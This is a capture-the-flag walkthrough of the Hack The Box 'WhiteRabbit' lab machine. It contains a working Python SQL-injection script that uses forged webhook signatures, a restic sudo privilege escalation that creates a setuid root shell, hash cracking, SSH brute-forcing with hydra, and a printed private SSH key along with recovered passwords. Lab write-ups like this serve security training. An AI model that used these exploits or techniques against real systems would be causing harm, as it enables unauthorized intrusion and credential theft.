WhiteRabbit

#insane #linux

https://app.hackthebox.com/machines/WhiteRabbit

---

sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/whiterabbit 10.10.11.63

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 63
80/tcp   open  http         syn-ack ttl 62
2222/tcp open  EtherNetIP-1 syn-ack ttl 62

nmap -p 22,80,2222 -sCV -oA nmap/whiterabbit_scripts 10.10.11.63

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0f:b0:5e:9f:85:81:c6:ce:fa:f4:97:c2:99:c5:db:b3 (ECDSA)
|_  256 a9:19:c3:55:fe:6a:9a:1b:83:8f:9d:21:0a:08:95:47 (ED25519)
80/tcp   open  http    Caddy httpd
|_http-title: Did not follow redirect to http://whiterabbit.htb
|_http-server-header: Caddy
2222/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c8:28:4c:7a:6f:25:7b:58:76:65:d8:2e:d1:eb:4a:26 (ECDSA)
|_  256 ad:42:c0:28:77:dd:06:bd:19:62:d8:17:30:11:3c:87 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add whiterabbit.htb to /etc/hosts file

http://whiterabbit.htb/

ffuf -u http://whiterabbit.htb -H 'Host: FUZZ.whiterabbit.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 80 -c -ic -fs 0

status                  [Status: 302, Size: 32, Words: 4, Lines: 1, Duration: 174ms]

Add status.whiterabbit.htb to /etc/hosts file

Username: admin
Password: admin

Uptime Kuma Frontend Version: 1.23.13

ffuf -u http://status.whiterabbit.htb/status/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 80 -ic -c

temp                    [Status: 200, Size: 3359, Words: 304, Lines: 41, Duration: 352ms]

http://status.whiterabbit.htb/status/temp

Add wddb09a8558c9.whiterabbit.htb and a668910b5514e.whiterabbit.htb to /etc/hosts file

http://a668910b5514e.whiterabbit.htb/en/gophish_webhooks

Download gophish_to_phishing_score_database.json

Add 28efa8f7df.whiterabbit.htb to /etc/hosts file

http://28efa8f7df.whiterabbit.htb

import requests
import sys
import hmac
import hashlib
import json
import re
import time

def tamper(payload):
    params = '{"campaign_id":1,"email":"%s","message":"Clicked Link"}' % payload
    secret = '3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS'.encode('utf-8')
    payload_bytes = params.encode("utf-8")
    signature = 'sha256=' + hmac.new(secret, payload_bytes, hashlib.sha256).hexdigest()
    params = json.loads(params)
    return params, signature

def extract_value(url, payload_template, rhost, **kwargs):
    payload = payload_template.format(**kwargs)
    params, signature = tamper(payload)
    headers = {"Host": "28efa8f7df.whiterabbit.htb", 'x-gophish-signature': signature}
    proxies = {"http": "http://127.0.0.1:8080"}
    try:
        response = requests.post(url, json=params, timeout=10, headers=headers, proxies=proxies)
    except Exception as e:
        print(f"Error connecting to URL: {e}")
        return None

    match = re.search(r"~([^~]+)~", response.text, re.DOTALL)
    if match:
        return match.group(1)
    return None

def extract_databases(url, rhost):
    databases = []
    payload_template = r'\" OR updatexml(1, concat(0x7e, (SELECT schema_name FROM information_schema.schemata WHERE schema_name NOT LIKE \"information_schema\" LIMIT {offset},1), 0x7e), 1) ;'
    offset = 0
    while True:
        db = extract_value(url, payload_template, rhost, offset=offset)
        if db and db not in databases:
            databases.append(db)
            offset += 1
        else:
            break
    return databases

def extract_tables(url, rhost, db):
    tables = []
    payload_template = r'\" OR updatexml(1, concat(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema=\"{db}\" LIMIT {offset},1), 0x7e), 1) ;'
    offset = 0
    while True:
        table = extract_value(url, payload_template, rhost, db=db, offset=offset)
        if table and table not in tables:
            tables.append(table)
            offset += 1
        else:
            break
    return tables

def extract_columns(url, rhost, db, table):
    columns = []
    payload_template = r'\" OR updatexml(1, concat(0x7e, (SELECT column_name FROM information_schema.columns WHERE table_schema=\"{db}\" AND table_name=\"{table}\" LIMIT {offset},1), 0x7e), 1) ;'
    offset = 0
    while True:
        column = extract_value(url, payload_template, rhost, db=db, table=table, offset=offset)
        if column and column not in columns:
            columns.append(column)
            offset += 1
        else:
            break
    return columns

def extract_data(url, rhost, db, table, column):
    data_rows = []
    payload_template = r'\" OR updatexml(1, concat(0x7e, (SELECT {column} FROM {db}.{table} LIMIT {offset},1), 0x7e), 1) ;'
    offset = 0
    while True:
        data = extract_value(url, payload_template, rhost, db=db, table=table, column=column, offset=offset)
        if data and data not in data_rows:
            data_rows.append(data)
            offset += 1
        else:
            break
    return data_rows

def extract_column_data(url, rhost, db, table, column):
    data_rows = []
    payload_template = r'\" OR updatexml(1, concat(0x7e, (SELECT t1.`{column}` FROM `{db}`.`{table}` t1 WHERE (SELECT COUNT(*) FROM `{db}`.`{table}` t2 WHERE t2.`{column}` <= t1.`{column}`) = {offset}+1 LIMIT 1), 0x7e), 1) ;'
    offset = 0
    while True:
        data = extract_value(url, payload_template, rhost, db=db, table=table, column=column, offset=offset)
        if data:
            data_rows.append(data)
            offset += 1
        else:
            break
    return data_rows

def extract_all_data(url, rhost, table, column):
    data_rows = []
    for id_val in range(1, 7):
        row_data = ""
        chunk_size = 18
        pos = 1
        while True:
            payload_template = (
                r'\" OR updatexml(1,concat(0x7e,('
                r'select SUBSTRING({column}, {pos}, {chunk_size}) '
                r'from temp.{table} where id={id_val}'
                r'),0x7e),1) -- '
            )

            data = extract_value(
                url,
                payload_template,
                rhost,
                pos=pos,
                chunk_size=chunk_size,
                id_val=id_val,
                table=table,
                column=column,
            )

            if not data:
                break

            row_data += data
            if len(data) < chunk_size:
                break
            
            pos += chunk_size

        if row_data.strip():
            data_rows.append((id_val, row_data))
        else:
            print(f"[-] No data for id {id_val}")
    return data_rows

def perform_sql_injection(rhost):
    print("[i] Performing SQL injection...")
    url = f"http://{rhost}/webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d"
    databases = extract_databases(url, rhost)
    if not databases:
        print(f"[!] No databases found.")
        return

    for db in databases:
        print(f"[+] Got database: {db}")
        if not db == "phishing":
            tables = extract_tables(url, rhost, db)
            if not tables:
                print(f"[!] No tables found for database {db}.")
                continue

    for table in tables:
        print(f"[+] Got table: {table}")
        print("[i] Extracting Columns...")
        columns = extract_columns(url, rhost, db, table)
        if not columns:
            print(f"[!] No columns found for table {table} in database {db}.")
            continue

    for column in columns:
        print(f"[+] Got column: {column}")
        print("[i] Extracting Data...")
        rows = extract_all_data(url, rhost, table, column)
        for row in rows:
            print(f"[+] {row}")

if __name__ == '__main__':
    rhost = "10.10.11.63"
    perform_sql_injection(rhost)

python3 sql_injection.py
[i] Performing SQL injection...
[+] Got database: phishing
[+] Got database: temp
[+] Got table: command_log
[i] Extracting Columns...
[+] Got column: id
[i] Extracting Data...
[+] (1, '1')
[+] (2, '2')
[+] (3, '3')
[+] (4, '4')
[+] (5, '5')
[+] (6, '6')
[+] Got column: command
[i] Extracting Data...
[+] (1, 'uname -a')
[+] (2, 'restic init --repo rest:http://75951e6ff.whiterabbit.htb')
[+] (3, 'echo ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw > .restic_passwd')
[+] (4, 'rm -rf .bash_history ')
[+] (5, '#thatwasclose')
[+] (6, 'cd /home/neo/ && /opt/neo-password-generator/neo-password-generator | passwd')
[+] Got column: date
[i] Extracting Data...
[+] (1, '2024-08-30 10:44:01')
[+] (2, '2024-08-30 11:58:05')
[+] (3, '2024-08-30 11:58:36')
[+] (4, '2024-08-30 11:59:02')
[+] (5, '2024-08-30 11:59:47')
[+] (6, '2024-08-30 14:40:42')

Add 75951e6ff.whiterabbit.htb to /etc/hosts file

sudo pacman -S restic

RESTIC_PASSWORD=ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw restic -r rest:http://75951e6ff.whiterabbit.htb check
using temporary cache in /tmp/restic-check-cache-19095181
create exclusive lock for repository
repository 5b26a938 opened (version 2, compression level auto)
created new cache in /tmp/restic-check-cache-19095181
load indexes
[0:00] 100.00%  5 / 5 index files loaded
pack 28cf3dff1e473e0d35812c74b401504f2c73b3816b9ed97baaab4b4eb83436ce contained in several indexes: {354ae3ea bddbd35b c6d5360e}
pack 7988d2d37a4ccbee88858cd0e49fb8b7c1dc0e5b0f7852ca693f637992b057b4 contained in several indexes: {354ae3ea 7aebf98b c6d5360e}
pack fca07af9fcb23f378b2a08e1d361a98343465f9db1394d05de3faee0f543f67a contained in several indexes: {354ae3ea c6d5360e}
pack 1fca34c13a720ecccea8908b82eeb66ccef4e79f212ff9460b9efb0d0801b892 contained in several indexes: {65fc5299 c6d5360e}
pack 4f9dd56ef3bafcdb66288f4640067b9b93b4a7f81235b024864079f5b5d2c8e4 contained in several indexes: {bddbd35b c6d5360e}
Duplicate packs are non-critical, you can run `restic repair index' to correct this.
check all packs
check snapshots, trees and blobs
[0:00] 100.00%  1 / 1 snapshots
no errors were found

RESTIC_PASSWORD=ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw restic -r rest:http://75951e6ff.whiterabbit.htb snapshots
repository 5b26a938 opened (version 2, compression level auto)
created new cache in /home/arch/.cache/restic
ID        Time                 Host         Tags        Paths
------------------------------------------------------------------------
272cacd5  2025-03-06 21:18:40  whiterabbit              /dev/shm/bob/ssh
------------------------------------------------------------------------
1 snapshots

mkdir restic

RESTIC_PASSWORD=ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw restic -r rest:http://75951e6ff.whiterabbit.htb restore 272cacd5 --target ./restic/
repository 5b26a938 opened (version 2, compression level auto)
[0:00] 100.00%  5 / 5 index files loaded
restoring snapshot 272cacd5 of [/dev/shm/bob/ssh] at 2025-03-06 17:18:40.024074307 -0700 -0700 by ctrlzero@whiterabbit to ./restic/
Summary: Restored 5 files/dirs (572 B) in 0:00

cd restic/dev/shm/bob/ssh/
7z2john bob.7z
bob.7z:$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$7295a784b0a8cfa7d2b0a8a6f88b961c8351682f167ab77e7be565972b82576e7b5ddd25db30eb27137078668756bf9dff5ca3a39ca4d9c7f264c19a58981981486a4ebb4a682f87620084c35abb66ac98f46fd691f6b7125ed87d58e3a37497942c3c6d956385483179536566502e598df3f63959cf16ea2d182f43213d73feff67bcb14a64e2ecf61f956e53e46b17d4e4bc06f536d43126eb4efd1f529a2227ada8ea6e15dc5be271d60360ff5c816599f0962fc742174ff377e200250b835898263d997d4ea3ed6c3fc21f64f5e54f263ebb464e809f9acf75950db488230514ee6ed92bd886d0a9303bc535ca844d2d2f45532486256fbdc1f606cca1a4680d75fa058e82d89fd3911756d530f621e801d73333a0f8419bd403350be99740603dedff4c35937b62a1668b5072d6454aad98ff491cb7b163278f8df3dd1e64bed2dac9417ca3edec072fb9ac0662a13d132d7aa93ff58592703ec5a556be2c0f0c5a3861a32f221dcb36ff3cd713$399$00

hashcat --username hashes/whiterabbit.7z /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$7295a784b0a8cfa7d2b0a8a6f88b961c8351682f167ab77e7be565972b82576e7b5ddd25db30eb27137078668756bf9dff5ca3a39ca4d9c7f264c19a58981981486a4ebb4a682f87620084c35abb66ac98f46fd691f6b7125ed87d58e3a37497942c3c6d956385483179536566502e598df3f63959cf16ea2d182f43213d73feff67bcb14a64e2ecf61f956e53e46b17d4e4bc06f536d43126eb4efd1f529a2227ada8ea6e15dc5be271d60360ff5c816599f0962fc742174ff377e200250b835898263d997d4ea3ed6c3fc21f64f5e54f263ebb464e809f9acf75950db488230514ee6ed92bd886d0a9303bc535ca844d2d2f45532486256fbdc1f606cca1a4680d75fa058e82d89fd3911756d530f621e801d73333a0f8419bd403350be99740603dedff4c35937b62a1668b5072d6454aad98ff491cb7b163278f8df3dd1e64bed2dac9417ca3edec072fb9ac0662a13d132d7aa93ff58592703ec5a556be2c0f0c5a3861a32f221dcb36ff3cd713$399$00:1q2w3e4r5t6y

7z x bob.7z 

7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 572 bytes (1 KiB)

Extracting archive: bob.7z
--
Path = bob.7z
Type = 7z
Physical Size = 572
Headers Size = 204
Method = LZMA2:12 7zAES
Solid = +
Blocks = 1

    
Enter password:1q2w3e4r5t6y

Everything is Ok

Files: 3
Size:       557
Compressed: 572

chmod 600 bob
ssh -i bob bob@whiterabbit.htb -p 2222
The authenticity of host '[whiterabbit.htb]:2222 ([10.10.11.63]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:jWKKPrkxU01KGLZeBG3gDZBIqKBFlfctuRcPBBG39sA
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[whiterabbit.htb]:2222' (ED25519) to the list of known hosts.
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Mar 24 15:40:49 2025 from 10.10.14.62
bob@ebdce80611e9:~$ 

bob@ebdce80611e9:~$ sudo -l
Matching Defaults entries for bob on ebdce80611e9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User bob may run the following commands on ebdce80611e9:
    (ALL) NOPASSWD: /usr/bin/restic
bob@ebdce80611e9:~$ sudo restic --password-command "touch /tmp/test" check
using temporary cache in /tmp/restic-check-cache-3661813382
Fatal: Please specify repository location (-r or --repository-file)
bob@ebdce80611e9:~$ sudo restic --password-command "cp /bin/bash /tmp/test" check
using temporary cache in /tmp/restic-check-cache-3506714875
Fatal: Please specify repository location (-r or --repository-file)
bob@ebdce80611e9:~$ sudo restic --password-command "chmod 4755 /tmp/test" check
using temporary cache in /tmp/restic-check-cache-1512090143
Fatal: Please specify repository location (-r or --repository-file)
bob@ebdce80611e9:~$ /tmp/test -p
test-5.2# id
uid=1001(bob) gid=1001(bob) euid=0(root) groups=1001(bob)

test-5.2# cd /root
test-5.2# ls
morpheus  morpheus.pub
test-5.2# cat morpheus
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQS/TfMMhsru2K1PsCWvpv3v3Ulz5cBP
UtRd9VW3U6sl0GWb0c9HR5rBMomfZgDSOtnpgv5sdTxGyidz8TqOxb0eAAAAqOeHErTnhx
K0AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL9N8wyGyu7YrU+w
Ja+m/e/dSXPlwE9S1F31VbdTqyXQZZvRz0dHmsEyiZ9mANI62emC/mx1PEbKJ3PxOo7FvR
4AAAAhAIUBairunTn6HZU/tHq+7dUjb5nqBF6dz5OOrLnwDaTfAAAADWZseEBibGFja2xp
c3QBAg==
-----END OPENSSH PRIVATE KEY-----

Copy morpheus to local machine

chmod 600 morpheus
ssh -i morpheus morpheus@whiterabbit.htb
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Dec 29 20:02:51 2025 from 10.10.14.50
morpheus@whiterabbit:~$ ls
user.txt
morpheus@whiterabbit:~$ cat user.txt 

User flag

dd01************************2bc5

scp -i morpheus morpheus@whiterabbit.htb:/opt/neo-password-generator/neo* .
neo-password-generator

mkdir pwgen
cd pwgen
go mod init pwgen
go: creating new go.mod: module pwgen

main.go

package main

/*
#include <stdlib.h>
*/
import "C"

import (
	"fmt"
	"time"
	"os"
)

const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

func generateRandomString(seed int) string {
	C.srand(C.uint(seed))

	out := make([]byte, 20)
	for i := 0; i < 20; i++ {
		randIndex := int(C.rand()) % len(charset)
		out[i] = charset[randIndex]
	}
	return string(out)
}

func main() {
	// Parse Timestamp 
	t, err := time.Parse("2006-01-02 15:04:05", os.Args[1])
	if err != nil {
		panic(err)
	}

	seed := int(t.Unix())

	seen := make(map[string]struct{})
	for ms := 0; ms < 1000; ms++ {
		currentSeed := seed*1000 + int(ms)
		pw := generateRandomString(currentSeed)
		if _, exists := seen[pw]; !exists {
			seen[pw] = struct{}{}
			fmt.Println(pw)
		}
	}
}

go run main.go "2024-08-30 14:40:42" > passwords

hydra -l neo -P passwords ssh://whiterabbit.htb
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-29 18:27:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ssh://whiterabbit.htb:22/
[22][ssh] host: whiterabbit.htb   login: neo   password: WBSxhWgfnMiclrV4dqfj
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-29 18:27:20

morpheus@whiterabbit:~$ su neo                                                                                                                                                                                
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

neo@whiterabbit:/home/morpheus$ sudo -l
[sudo] password for neo: 
Matching Defaults entries for neo on whiterabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User neo may run the following commands on whiterabbit:
    (ALL : ALL) ALL
neo@whiterabbit:/home/morpheus$ sudo su
root@whiterabbit:/home/morpheus# cd /root
root@whiterabbit:~# ls
root.txt
root@whiterabbit:~# cat root.txt 

Root flag

3073************************f8e6